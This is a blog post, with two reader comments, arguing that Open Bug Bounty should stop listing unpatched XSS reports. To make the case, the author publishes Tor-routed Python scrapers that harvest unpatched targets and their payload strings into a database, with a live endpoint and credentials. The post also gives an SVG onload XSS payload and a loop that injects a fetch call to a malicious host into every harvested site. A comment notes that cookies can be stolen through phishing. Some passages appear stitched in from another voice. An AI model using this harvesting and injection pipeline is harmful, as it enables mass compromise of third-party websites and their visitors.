Why Open Bug Bounty Should Restrict Their Site

While I was administering a website for a local news station, it was brought to my attention that the CMS we were using was vulnerable to cross-site scripting (XSS). The organization “Open Bug Bounty” emailed our point of contact and disclosed the bug responsibly. At first we didn’t know whether to take the email seriously, but eventually, after showing the email to the owners of our content management system, we confirmed that the bug was serious, and it was patched. This incident brought to my personal attention that the site “Open Bug Bounty” was offering a service to the web development community that allowed site owners to secure their sites against XSS attacks.

After some poking around the site, I discovered that it also displays vulnerable sites that remain unpatched, which led me to immediately log the information in my own database. Using the open-source cloudflare-scrape library (cfscrape), I was able to log all of the site’s unpatched vulnerabilities. So far, my database contains over 4,000 vulnerabilities ready to be implemented in some sort of botnet. And I consider myself on the low end of pentesters, so someone with a real grasp of netsec could really do damage with this information.

The site, which currently resides here, shows over one thousand vulnerable websites. This is a haven for hackers and script kiddies alike, allowing those with the knowledge to potentially cause damage on a worldwide scale. The information is open source and publicly accessible; all I did was create a scraper that put it into a database. I did not personally use this information, but one could easily stand up a Python bot to test each of these vulnerabilities and then inject scripts ranging from simple redirects up to keyloggers installed on the front end of the site.

For example, one of the entries Open Bug Bounty logged was a URL that allowed JavaScript to execute once an SVG graphic was loaded. Other major sites have made their way onto the site as well, free for users to peruse at will.
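To illustrate the shape of that kind of payload, here is a minimal sketch. The parameter name, URL, and harmless alert() call below are my own placeholders, not the contents of the actual report:

# Hypothetical illustration only: if a query parameter is reflected into the
# page unescaped, an attacker can break out of the attribute and inject an
# <svg> element whose onload handler fires as soon as the graphic is parsed.
payload = '"><svg onload=alert(document.domain)>'
poc_url = "https://example.com/search?q=" + payload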

Open Bug Bounty should really make this information private. Despite the fact that they ‘responsibly disclose’ reports to site owners, they still allow unpatched vulnerabilities to surface on the clear net once a certain amount of time has passed. That is effectively holding a site hostage: coercing it into behaving a certain way, or else.

I will post the two scrapers I made below, to show that I did nothing outrageous in order to amass this information. If Open Bug Bounty sees this, I recommend at least hiding all vulnerabilities until they are patched, instead of giving site owners an ultimatum: patch, or it will be released!

SCRIPT 1: This script visited each listing page of Open Bug Bounty after connecting through Tor, allowing the scraper to log all of the relevant information into one of my own databases.

import requests
from bs4 import BeautifulSoup
from selenium import webdriver
from selenium.webdriver.firefox.options import Options

def tor_profile():
    # Route all browser traffic (including DNS lookups) through the local
    # Tor SOCKS proxy listening on 127.0.0.1:9050.
    profile = webdriver.FirefoxProfile()
    profile.set_preference("network.proxy.type", 1)
    profile.set_preference("network.proxy.socks", '127.0.0.1')
    profile.set_preference("network.proxy.socks_port", 9050)
    profile.set_preference("network.proxy.socks_remote_dns", True)
    profile.update_preferences()
    return profile

def headless():
    options = Options()
    options.headless = True
    return webdriver.Firefox(firefox_profile=tor_profile(), options=options)

def standard():
    return webdriver.Firefox(firefox_profile=tor_profile())

lower_bound = 1150
upper_bound = 7789

for page in range(lower_bound, upper_bound):

    driver = headless()
    page_url = "https://openbugbounty.org/latest/page/" + str(page) + "/"
    print page_url
    driver.get(page_url)

    page_soup = BeautifulSoup(driver.page_source, 'html.parser')

    # Each report is a table row inside the main content div.
    table_wrapper = page_soup.find('div', {'class': 'content'})
    table_div = table_wrapper.findAll('tr')

    for td in table_div:

        table_data = td.findAll('td')

        # Skip the header row (it has <th> cells, not <td>).
        if len(table_data) < 4:
            continue

        # Only log reports whose status column still reads "unpatched".
        if table_data[3].text.strip() == 'unpatched':

            link = table_data[0].find('a').get('href')
            cat_link = "https://www.openbugbounty.org" + link
            domain = table_data[0].text.strip()

            data = {'link': cat_link, 'domain': domain, 'picklerick': 'picklerick'}
            url = "http://198.58.114.199/endpoint_unpatched.php"

            r = requests.post(url, data)
            if r.status_code != 200:
                print "Could not log data: " + str(data)

    driver.close()

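Before kicking off a scrape that long, it is worth confirming that the SOCKS proxy really is routing through Tor. Here is a minimal sanity check of my own (not part of the original scraper), assuming requests is installed with SOCKS support (requests[socks]):

import requests

proxies = {
    "http": "socks5h://127.0.0.1:9050",   # socks5h resolves DNS through the proxy too
    "https": "socks5h://127.0.0.1:9050",
}

# check.torproject.org reports whether the requesting IP is a Tor exit node.
r = requests.get("https://check.torproject.org/api/ip", proxies=proxies, timeout=30)
print r.json()  # expect something like {"IsTor": true, "IP": "..."}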
SCRIPT 2: Once all the relevant URLs were logged in the database, this scraper visited each report page and logged the vulnerability string with the help of cfscrape.

import cfscrape
from bs4 import BeautifulSoup
import MySQLdb as my

def get_results(page):
    # cfscrape solves the Cloudflare anti-bot challenge before fetching,
    # then we pull the proof-of-concept string out of the report's textarea.
    scraper = cfscrape.create_scraper()
    page_content = scraper.get(page).content
    soup = BeautifulSoup(page_content, 'html.parser')
    table = soup.find('table', {'class': 'url-block'})
    text_area = table.find('textarea')
    return text_area.contents[0]

db = my.connect('localhost', 'python', 'mufasa.gq', 'open_bug_reports')
cursor = db.cursor()

cursor.execute("SELECT id, link, domain FROM unpatched WHERE id > 881")
result = cursor.fetchall()

for row in result:
    rel_id = row[0]
    domain = row[2]
    try:
        vuln = get_results(row[1])
        # Parameterized query instead of string formatting, so the scraped
        # payload can't break out of (or inject into) the INSERT statement.
        cursor.execute(
            "INSERT INTO vuln_strings (rel_id, vuln, domain) VALUES (%s, %s, %s)",
            (rel_id, vuln, domain)
        )
        db.commit()
    except Exception:
        print "Could not log vulnerable string for domain: " + domain

db.close()

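For completeness, here is a plausible reconstruction of the two tables the scripts write to. The original never shows the actual CREATE statements, so the column names and types below are my own guesses based on how the scripts use them:

import MySQLdb as my

db = my.connect('localhost', 'python', 'mufasa.gq', 'open_bug_reports')
cursor = db.cursor()

# Populated by script 1 via the PHP endpoint: one row per unpatched report.
cursor.execute("""
    CREATE TABLE IF NOT EXISTS unpatched (
        id     INT AUTO_INCREMENT PRIMARY KEY,
        link   VARCHAR(512) NOT NULL,  -- openbugbounty.org report URL
        domain VARCHAR(255) NOT NULL   -- affected domain
    )
""")

# Populated by script 2: the proof-of-concept string scraped from each report.
cursor.execute("""
    CREATE TABLE IF NOT EXISTS vuln_strings (
        id     INT AUTO_INCREMENT PRIMARY KEY,
        rel_id INT NOT NULL,           -- references unpatched.id
        vuln   TEXT NOT NULL,          -- the PoC URL/payload string
        domain VARCHAR(255) NOT NULL
    )
""")

db.commit()
db.close()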
I will lay out some pseudo-code for how one could take each of the URLs logged in the database and upload malicious scripts.

# Pseudo-code only: query(), the table names, and the URL are placeholders.
sql = "SELECT vuln_url FROM vulns_table"
result = query(conn, sql)

for url in result:
    try:
        success = requests.get(url + "?onload=fetch('https://malicious-url/')")
        if success:
            sql = "INSERT INTO success_table (vuln, script) VALUES (vuln, script)"
            result = query(conn, sql)
    except:
        pass


2 Replies to “Why Open Bug Bounty Should Restrict Their Site”

  1. It sounds as though you got burned on this and are now blaming the site, when really the vulnerability wasn’t remediated fast enough. You admitted yourself that you didn’t initially take the vulnerability seriously, which, unsurprisingly, proved fatal.

    Additionally:

    “So far, my database contains over 4,000 vulnerabilities ready to be implemented in some sort of botnet.”

    Reflected XSS isn’t plausible as the basis for a botnet.

    “And I consider myself on the low end of pentesters, so someone with a real grasp of netsec could really do damage with this information.”

    Most medium/high-end pentesters could already identify this kind of stuff on the fly with something like Shodan. It’s never been that hard to make a botnet; people just choose not to out of ethics.

  2. About the reflected XSS: yes, after I wrote this I realized reflected XSS attacks can’t be used to access the server. But they can be used to harvest session cookies by sending phishing attacks with the loaded link. That puts users at risk, which is more dangerous than the server being at risk.
